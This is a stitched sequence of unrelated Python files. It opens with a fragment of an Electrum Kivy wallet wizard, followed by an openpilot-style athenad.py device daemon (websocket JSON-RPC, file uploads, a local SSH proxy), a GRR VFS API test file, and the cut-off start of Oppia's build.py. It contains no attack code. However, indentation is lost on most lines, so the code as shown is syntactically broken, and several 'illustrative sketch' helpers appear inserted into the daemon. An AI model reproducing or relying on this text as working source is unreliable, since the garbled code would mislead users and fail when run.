def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, db=None, aborted=False):
if storage is None and not aborted:
storage, db = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage, db)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def choice_and_line_dialog(self, **kwargs): ChoiceLineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
        kwargs['message'] = _("Please paste your cosigner's master public key, or scan it using the camera button.")
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pw, pw):
assert old_pw is None
run_next(pw, True)
def on_failure():
self.show_error(_('Password mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(
app,
check_password=lambda x:True,
on_success=on_success,
on_failure=on_failure,
is_change=True,
is_password=True,
message=_('Choose a password'))
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import queue
import random
import select
import socket
import subprocess
import sys
import tempfile
import threading
import time
from collections import namedtuple
from datetime import datetime
from functools import partial
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import (ABNF, WebSocketException, WebSocketTimeoutException,
create_connection)
import cereal.messaging as messaging
from cereal import log
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.file_helpers import CallbackReader
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC, TICI
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.statsd import STATS_DIR
from selfdrive.swaglog import SWAGLOG_DIR, cloudlog
from selfdrive.version import get_commit, get_origin, get_short_branch, get_version
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.api.retropilot.org')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
MAX_AGE = 31 * 24 * 3600 # seconds
WS_FRAME_SIZE = 4096
NetworkType = log.DeviceState.NetworkType
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress', 'allow_cellular'], defaults=(0, False, 0, False))
cur_upload_items: Dict[int, Any] = {}
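# Illustrative sketch (not part of the original daemon): shows how the UploadItem
# defaults above apply. The trailing fields retry_count, current, progress and
# allow_cellular take (0, False, 0, False) when omitted; the path and url below
# are hypothetical placeholders.
def _example_upload_item() -> UploadItem:
  return UploadItem(path="/data/example.bz2",
                    url="https://upload.example.invalid/example.bz2",
                    headers={},
                    created_at=int(time.time() * 1000),
                    id=None)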
class AbortTransferException(Exception):
pass
class UploadQueueCache():
params = Params()
@staticmethod
def initialize(upload_queue):
try:
upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
if upload_queue_json is not None:
for item in json.loads(upload_queue_json):
upload_queue.put(UploadItem(**item))
except Exception:
cloudlog.exception("athena.UploadQueueCache.initialize.exception")
@staticmethod
def cache(upload_queue):
try:
items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
except Exception:
cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
end_event = threading.Event()
threads = [
threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
] + [
threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
for x in range(HANDLER_THREADS)
]
for thread in threads:
thread.start()
try:
while not end_event.is_set():
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
end_event.set()
raise
finally:
for thread in threads:
cloudlog.debug(f"athena.joining {thread.name}")
thread.join()
def jsonrpc_handler(end_event):
dispatcher["startLocalProxy"] = partial(startLocalProxy, end_event)
while not end_event.is_set():
try:
data = recv_queue.get(timeout=1)
if "method" in data:
cloudlog.debug(f"athena.jsonrpc_handler.call_method {data}")
response = JSONRPCResponseManager.handle(data, dispatcher)
send_queue.put_nowait(response.json)
elif "id" in data and ("result" in data or "error" in data):
log_recv_queue.put_nowait(data)
else:
raise Exception("not a valid request or response")
except queue.Empty:
pass
except Exception as e:
cloudlog.exception("athena jsonrpc handler failed")
send_queue.put_nowait(json.dumps({"error": str(e)}))
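# Illustrative sketch (not part of the original daemon): the handler above treats
# queue entries as JSON-RPC strings. Calling this helper (it is never invoked
# here) would exercise the built-in "echo" method registered above; the id value
# is arbitrary.
def _example_echo_request() -> None:
  request = {"jsonrpc": "2.0", "method": "echo", "params": ["ping"], "id": 1}
  recv_queue.put_nowait(json.dumps(request))
  # a worker thread then places '{"jsonrpc": "2.0", "result": "ping", "id": 1}'
  # (field order may differ) on send_queue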
def retry_upload(tid: int, end_event: threading.Event, increase_count: bool = True) -> None:
if cur_upload_items[tid].retry_count < MAX_RETRY_COUNT:
item = cur_upload_items[tid]
new_retry_count = item.retry_count + 1 if increase_count else item.retry_count
item = item._replace(
retry_count=new_retry_count,
progress=0,
current=False
)
upload_queue.put_nowait(item)
UploadQueueCache.cache(upload_queue)
cur_upload_items[tid] = None
for _ in range(RETRY_DELAY):
time.sleep(1)
if end_event.is_set():
break
def upload_handler(end_event: threading.Event) -> None:
sm = messaging.SubMaster(['deviceState'])
tid = threading.get_ident()
cellular_unmetered = Params().get_bool("CellularUnmetered")
while not end_event.is_set():
cur_upload_items[tid] = None
try:
cur_upload_items[tid] = upload_queue.get(timeout=1)._replace(current=True)
if cur_upload_items[tid].id in cancelled_uploads:
cancelled_uploads.remove(cur_upload_items[tid].id)
continue
# Remove item if too old
age = datetime.now() - datetime.fromtimestamp(cur_upload_items[tid].created_at / 1000)
if age.total_seconds() > MAX_AGE:
cloudlog.event("athena.upload_handler.expired", item=cur_upload_items[tid], error=True)
continue
# Check if uploading over cell is allowed
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular) and (not cellular_unmetered):
retry_upload(tid, end_event, False)
continue
try:
def cb(sz, cur):
# Abort transfer if connection changed to cell after starting upload
sm.update(0)
cell = sm['deviceState'].networkType not in [NetworkType.wifi, NetworkType.ethernet]
if cell and (not cur_upload_items[tid].allow_cellular) and (not cellular_unmetered):
raise AbortTransferException
cur_upload_items[tid] = cur_upload_items[tid]._replace(progress=cur / sz if sz else 1)
network_type = sm['deviceState'].networkType.raw
fn = cur_upload_items[tid].path
try:
sz = os.path.getsize(fn)
except OSError:
sz = -1
cloudlog.event("athena.upload_handler.upload_start", fn=fn, sz=sz, network_type=network_type)
response = _do_upload(cur_upload_items[tid], cb)
if response.status_code not in (200, 201, 403, 412):
cloudlog.event("athena.upload_handler.retry", status_code=response.status_code, fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
else:
cloudlog.event("athena.upload_handler.success", fn=fn, sz=sz, network_type=network_type)
UploadQueueCache.cache(upload_queue)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError, requests.exceptions.SSLError):
cloudlog.event("athena.upload_handler.timeout", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event)
except AbortTransferException:
cloudlog.event("athena.upload_handler.abort", fn=fn, sz=sz, network_type=network_type)
retry_upload(tid, end_event, False)
except queue.Empty:
pass
except Exception:
cloudlog.exception("athena.upload_handler.exception")
def _do_upload(upload_item, callback=None):
with open(upload_item.path, "rb") as f:
size = os.fstat(f.fileno()).st_size
if callback:
f = CallbackReader(f, callback, size)
return requests.put(upload_item.url,
data=f,
headers={**upload_item.headers, 'Content-Length': str(size)},
timeout=30)
# security: user should be able to request any message from their car
@dispatcher.add_method
def getMessage(service=None, timeout=1000):
if service is None or service not in service_list:
raise Exception("invalid service")
socket = messaging.sub_sock(service, timeout=timeout)
ret = messaging.recv_one(socket)
if ret is None:
raise TimeoutError
return ret.to_dict()
@dispatcher.add_method
def getVersion():
return {
"version": get_version(),
"remote": get_origin(),
"branch": get_short_branch(),
"commit": get_commit(),
}
@dispatcher.add_method
def setNavDestination(latitude=0, longitude=0, place_name=None, place_details=None):
destination = {
"latitude": latitude,
"longitude": longitude,
"place_name": place_name,
"place_details": place_details,
}
Params().put("NavDestination", json.dumps(destination))
return {"success": 1}
def scan_dir(path, prefix):
files = list()
# only walk directories that match the prefix
# (glob and friends traverse entire dir tree)
with os.scandir(path) as i:
for e in i:
rel_path = os.path.relpath(e.path, ROOT)
if e.is_dir(follow_symlinks=False):
# add trailing slash
rel_path = os.path.join(rel_path, '')
# if prefix is a partial dir name, current dir will start with prefix
# if prefix is a partial file name, prefix with start with dir name
if rel_path.startswith(prefix) or prefix.startswith(rel_path):
files.extend(scan_dir(e.path, prefix))
else:
if rel_path.startswith(prefix):
files.append(rel_path)
return files
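# Illustrative sketch (not part of the original daemon): the prefix rule used by
# scan_dir above. The directory name is a made-up example; scan_dir descends into
# a directory whenever either string is a prefix of the other.
def _example_scan_dir_prefix_match(rel_path: str = '2021-01-01--00-00-00--0/',
                                   prefix: str = '2021-01-01') -> bool:
  return rel_path.startswith(prefix) or prefix.startswith(rel_path)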
@dispatcher.add_method
def listDataDirectory(prefix=''):
return scan_dir(ROOT, prefix)
@dispatcher.add_method
def reboot():
sock = messaging.sub_sock("deviceState", timeout=1000)
ret = messaging.recv_one(sock)
if ret is None or ret.deviceState.started:
raise Exception("Reboot unavailable")
def do_reboot():
time.sleep(2)
HARDWARE.reboot()
threading.Thread(target=do_reboot).start()
return {"success": 1}
@dispatcher.add_method
def uploadFileToUrl(fn, url, headers):
return uploadFilesToUrls([{
"fn": fn,
"url": url,
"headers": headers,
}])
@dispatcher.add_method
def uploadFilesToUrls(files_data):
items = []
failed = []
for file in files_data:
fn = file.get('fn', '')
if len(fn) == 0 or fn[0] == '/' or '..' in fn or 'url' not in file:
failed.append(fn)
continue
path = os.path.join(ROOT, fn)
if not os.path.exists(path):
failed.append(fn)
continue
item = UploadItem(
path=path,
url=file['url'],
headers=file.get('headers', {}),
created_at=int(time.time() * 1000),
id=None,
allow_cellular=file.get('allow_cellular', False),
)
upload_id = hashlib.sha1(str(item).encode()).hexdigest()
item = item._replace(id=upload_id)
upload_queue.put_nowait(item)
items.append(item._asdict())
UploadQueueCache.cache(upload_queue)
resp = {"enqueued": len(items), "items": items}
if failed:
resp["failed"] = failed
return resp
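# Illustrative sketch (not part of the original daemon): the expected shape of the
# files_data argument to uploadFilesToUrls above. All values are hypothetical
# placeholders; an entry with an absolute path, a '..' component or a missing
# 'url' key is reported back under "failed".
_EXAMPLE_FILES_DATA = [{
  "fn": "2021-01-01--00-00-00--0/qlog.bz2",
  "url": "https://upload.example.invalid/qlog.bz2",
  "headers": {},
  "allow_cellular": False,
}]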
@dispatcher.add_method
def listUploadQueue():
items = list(upload_queue.queue) + list(cur_upload_items.values())
return [i._asdict() for i in items if (i is not None) and (i.id not in cancelled_uploads)]
@dispatcher.add_method
def cancelUpload(upload_id):
if not isinstance(upload_id, list):
upload_id = [upload_id]
uploading_ids = {item.id for item in list(upload_queue.queue)}
cancelled_ids = uploading_ids.intersection(upload_id)
if len(cancelled_ids) == 0:
return 404
cancelled_uploads.update(cancelled_ids)
return {"success": 1}
@dispatcher.add_method
def primeActivated(activated):
return {"success": 1}
@dispatcher.add_method
def setBandwithLimit(upload_speed_kbps, download_speed_kbps):
if not TICI:
return {"success": 0, "error": "only supported on comma three"}
try:
HARDWARE.set_bandwidth_limit(upload_speed_kbps, download_speed_kbps)
return {"success": 1}
except subprocess.CalledProcessError as e:
return {"success": 0, "error": "failed to set limit", "stdout": e.stdout, "stderr": e.stderr}
def startLocalProxy(global_end_event, remote_ws_uri, local_port):
try:
if local_port not in LOCAL_PORT_WHITELIST:
raise Exception("Requested local port not whitelisted")
cloudlog.debug("athena.startLocalProxy.starting")
dongle_id = Params().get("DongleId").decode('utf8')
identity_token = Api(dongle_id).get_token()
ws = create_connection(remote_ws_uri,
cookie="jwt=" + identity_token,
enable_multithread=True)
ssock, csock = socket.socketpair()
local_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_sock.connect(('127.0.0.1', local_port))
local_sock.setblocking(0)
proxy_end_event = threading.Event()
threads = [
threading.Thread(target=ws_proxy_recv, args=(ws, local_sock, ssock, proxy_end_event, global_end_event)),
threading.Thread(target=ws_proxy_send, args=(ws, local_sock, csock, proxy_end_event))
]
for thread in threads:
thread.start()
cloudlog.debug("athena.startLocalProxy.started")
return {"success": 1}
except Exception as e:
cloudlog.exception("athenad.startLocalProxy.exception")
raise e
@dispatcher.add_method
def getPublicKey():
if not os.path.isfile(PERSIST + '/comma/id_rsa.pub'):
return None
with open(PERSIST + '/comma/id_rsa.pub') as f:
return f.read()
@dispatcher.add_method
def getSshAuthorizedKeys():
return Params().get("GithubSshKeys", encoding='utf8') or ''
@dispatcher.add_method
def getSimInfo():
return HARDWARE.get_sim_info()
@dispatcher.add_method
def getNetworkType():
return HARDWARE.get_network_type()
@dispatcher.add_method
def getNetworks():
return HARDWARE.get_networks()
@dispatcher.add_method
def takeSnapshot():
from selfdrive.camerad.snapshot.snapshot import jpeg_write, snapshot
ret = snapshot()
if ret is not None:
def b64jpeg(x):
if x is not None:
f = io.BytesIO()
jpeg_write(f, x)
return base64.b64encode(f.getvalue()).decode("utf-8")
else:
return None
return {'jpegBack': b64jpeg(ret[0]),
'jpegFront': b64jpeg(ret[1])}
else:
raise Exception("not available while camerad is started")
def get_logs_to_send_sorted():
# TODO: scan once then use inotify to detect file creation/deletion
curr_time = int(time.time())
logs = []
for log_entry in os.listdir(SWAGLOG_DIR):
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
if PC:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event):
  # keep the last scan time across iterations so the stats directory is only
  # scanned (at most) once every 10 seconds
  last_scan = 0
  while not end_event.is_set():
    curr_scan = sec_since_boot()
try:
if curr_scan - last_scan > 10:
stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
if len(stat_filenames) > 0:
stat_path = os.path.join(STATS_DIR, stat_filenames[0])
with open(stat_path) as f:
jsonrpc = {
"method": "storeStats",
"params": {
"stats": f.read()
},
"jsonrpc": "2.0",
"id": stat_filenames[0]
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
os.remove(stat_path)
last_scan = curr_scan
except Exception:
cloudlog.exception("athena.stat_handler.exception")
time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = low_priority_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
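# Illustrative sketch (not part of the original daemon): ws_send above splits a
# message into WS_FRAME_SIZE chunks, sending the first as a TEXT frame and the
# rest as CONT frames, with the fin flag set only on the last fragment. The
# payload length below is a made-up example.
def _example_fragment_sizes(payload_len: int = 10000) -> list:
  # 10000 bytes with WS_FRAME_SIZE = 4096 -> fragments of 4096, 4096 and 1808 bytes
  return [min(WS_FRAME_SIZE, payload_len - i) for i in range(0, payload_len, WS_FRAME_SIZE)]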
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
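# Illustrative sketch (not part of the original daemon): upper bounds of the
# random reconnect delay produced by backoff above for the first few retries.
def _example_backoff_caps() -> list:
  # retries 0..8 -> caps of [1, 2, 4, 8, 16, 32, 64, 128, 128] seconds
  return [min(128, int(2 ** r)) for r in range(9)]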
def main():
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
params.delete("PrimeRedirected")
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
except socket.timeout:
try:
r = requests.get("http://api.retropilot.org/v1/me", allow_redirects=False,
headers={"User-Agent": f"openpilot-{get_version()}"}, timeout=15.0)
if r.status_code == 302 and r.headers['Location'].startswith("http://u.web2go.com"):
params.put_bool("PrimeRedirected", True)
except Exception:
cloudlog.exception("athenad.socket_timeout.exception")
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("PrimeRedirected")
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
vfs_test.py
|
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""Tests for API client and VFS-related API calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import io
import threading
import time
import zipfile
from grr_response_core.lib import flags
from grr_response_core.lib import rdfvalue
from grr_response_proto.api import vfs_pb2
from grr_response_server import aff4
from grr_response_server.gui import api_e2e_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class ApiClientLibVfsTest(api_e2e_test_lib.ApiE2ETest):
"""Tests VFS operations part of GRR Python API client library."""
def setUp(self):
super(ApiClientLibVfsTest, self).setUp()
self.client_urn = self.SetupClient(0)
fixture_test_lib.ClientFixture(self.client_urn, self.token)
def testGetFileFromRef(self):
file_ref = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
self.assertEqual(file_ref.path, "fs/os/c/Downloads/a.txt")
file_obj = file_ref.Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads/a.txt")
self.assertFalse(file_obj.is_directory)
self.assertEqual(file_obj.data.name, "a.txt")
def testGetFileForDirectory(self):
file_obj = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads").Get()
self.assertEqual(file_obj.path, "fs/os/c/Downloads")
self.assertTrue(file_obj.is_directory)
def testListFiles(self):
files_iter = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").ListFiles()
files_list = list(files_iter)
self.assertEqual(
sorted(f.data.name for f in files_list),
sorted(
[u"a.txt", u"b.txt", u"c.txt", u"d.txt", u"sub1", u"中国新闻网新闻中.txt"]))
def testGetBlob(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetBlobUnicode(self):
aff4.FACTORY.Copy("aff4:/C.1000000000000000/fs/tsk/c/bin/bash",
"aff4:/C.1000000000000000/fs/tsk/c/bin/中国新闻网新闻中")
out = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
u"fs/tsk/c/bin/中国新闻网新闻中").GetBlob().WriteToStream(out)
self.assertEqual(out.getvalue(), "Hello world")
def testGetFilesArchive(self):
zip_stream = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/tsk/c/bin").GetFilesArchive().WriteToStream(zip_stream)
zip_fd = zipfile.ZipFile(zip_stream)
namelist = zip_fd.namelist()
self.assertEqual(
sorted(namelist),
sorted([
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/rbash",
"vfs_C_1000000000000000_fs_tsk_c_bin/fs/tsk/c/bin/bash"
]))
def testGetVersionTimes(self):
vtimes = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").GetVersionTimes()
self.assertLen(vtimes, 1)
def testRefresh(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads").Refresh()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testRefreshWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads")
operation = f.Refresh()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testCollect(self):
operation = self.api.Client(client_id=self.client_urn.Basename()).File(
"fs/os/c/Downloads/a.txt").Collect()
self.assertTrue(operation.operation_id)
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def testCollectWaitUntilDone(self):
f = self.api.Client(
client_id=self.client_urn.Basename()).File("fs/os/c/Downloads/a.txt")
operation = f.Collect()
self.assertEqual(operation.GetState(), operation.STATE_RUNNING)
def ProcessOperation():
time.sleep(1)
# We assume that the operation id is the URN of a flow.
flow_test_lib.TestFlowHelper(
rdfvalue.RDFURN(operation.operation_id),
client_id=self.client_urn,
token=self.token)
threading.Thread(target=ProcessOperation).start()
result_f = operation.WaitUntilDone().target_file
self.assertEqual(f.path, result_f.path)
self.assertEqual(operation.GetState(), operation.STATE_FINISHED)
def testGetTimeline(self):
timeline = self.api.Client(
client_id=self.client_urn.Basename()).File("fs").GetTimeline()
self.assertTrue(timeline)
for item in timeline:
self.assertIsInstance(item, vfs_pb2.ApiVfsTimelineItem)
def testGetTimelineAsCsv(self):
out = io.BytesIO()
self.api.Client(client_id=self.client_urn.Basename()).File(
"fs").GetTimelineAsCsv().WriteToStream(out)
self.assertTrue(out.getvalue())
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
build.py
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
from scripts import servers
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
